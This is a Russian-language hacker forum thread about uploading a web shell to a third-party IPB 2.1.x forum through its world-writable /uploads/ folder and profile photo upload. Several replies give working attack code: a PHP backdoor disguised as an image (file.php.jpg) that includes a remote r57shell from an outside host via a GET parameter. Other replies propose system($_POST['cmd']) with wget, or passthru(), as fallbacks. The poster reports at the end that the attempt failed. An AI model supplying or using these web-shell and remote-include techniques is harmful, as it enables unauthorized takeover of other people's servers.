Есть на форуме папка с Chmod 0777
Можно как-нить в неё загрузить файл?

какие у тебя права и т.д?

Если папка открыта на запись, то это ещё не значит, что ты прям вот так просто сможешь заливать туда что-то)))) Это можно сделать ТОЛЬКО со стороны сервера, например, через какие-нить бажные скрипты шелл залить в эту папку. Это, если я правильно понимаю -))
Тоесть просто так всё равно ничё это не даёт.

форум ipb 2.1.х папка /uploads/, cmod 777, через загрузку фоты из профиля можно залить типа file.php.jpg в папке переименуецца на photo-1.txt размер загружаемого файла не больше 50 кб, залить шелл реально? или я туплю и мне пойти курить форум дальше? ...:)

Хм..... если они все переименовываются в txt, то значит txt опеределяется апачем как пхп т.к. фотки ведь отображаются...
Шелл должен работать

переименовываются file.php.jpg , а скрипт переименованный в file.jpg пишет Неудачная загрузка. Обратитесь к администрации форума для помощи.
шелл весит 100 кб )...нужно что-то поменьше

Есть шеллы поменьше

Сложно подумать =\

Создай файл file.php.jpg
С содержимым:
<?php
if(isset($_GET['xek'])) include($_GET['xek']);
?>

И к картинке своей обращайся file_kartinki.txt?xek=http://ontechad.by.ru/r57shell.php

Сложно подумать =\

Создай файл file.php.jpg
С содержимым:
<?php
if(isset($_GET['xek'])) include($_GET['xek']);
?>

И к картинке своей обращайся file_kartinki.txt?xek=http://ontechad.by.ru/r57shell.php
на некоторых хостах запрещен ремоут инклуд. так что лучше system($_POST['cmd']); а потом wget

на некоторых хостах запрещен ремоут инклуд. так что лучше system($_POST['cmd']); а потом wget
На некоторых хостах запрещен system :D

Isis твой вариант не работает

passthru()
Шелл должен работатьмало в это верится.;)

passthru()мне бы по популярнее объяснить, напр как Isis :)

Стоп!

Вообщем создай в файле
<?php
if(isset($_GET['xek'])) echo "XEEEEEEEEEK, я с античата!!!!!!!!!";
?>

Аналогично сделай
Если ничего не выведет, увы

ни-че-го ... спасибо всем за потраченное время)